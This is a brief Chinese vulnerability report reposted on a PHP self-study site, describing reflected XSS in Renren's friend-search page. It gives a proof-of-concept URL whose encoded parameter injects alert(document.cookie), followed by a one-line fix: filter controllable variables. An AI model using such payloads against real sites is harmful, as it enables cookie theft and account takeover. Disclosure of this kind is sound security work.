人人网多个另类XSS漏洞 - 网站安全 - 自学php

1.http://browse.renren测试数据/s/all?limit=10&p=%5B%7B%22t%22%3A%22high%22%2C%22name%22%3A%22x%22%2C%22year%22%3A2012%7D%2C%7Ba%3Aalert%28document.cookie%29%7D%5D&s=0&ref=sg_findfriend_highschool_search

修复方案：

可控变量过滤

声明：本文来自网络，不代表【好得很程序员自学网】立场，转载请注明出处：http://haodehen.cn/did13491

更新时间：2022-09-13 阅读：52次

上一篇：当当网任意用户密码修改漏洞 - 网站安全 - 自学

下一篇：ShopEx收货地址可任意查看修改删除 - 网站安全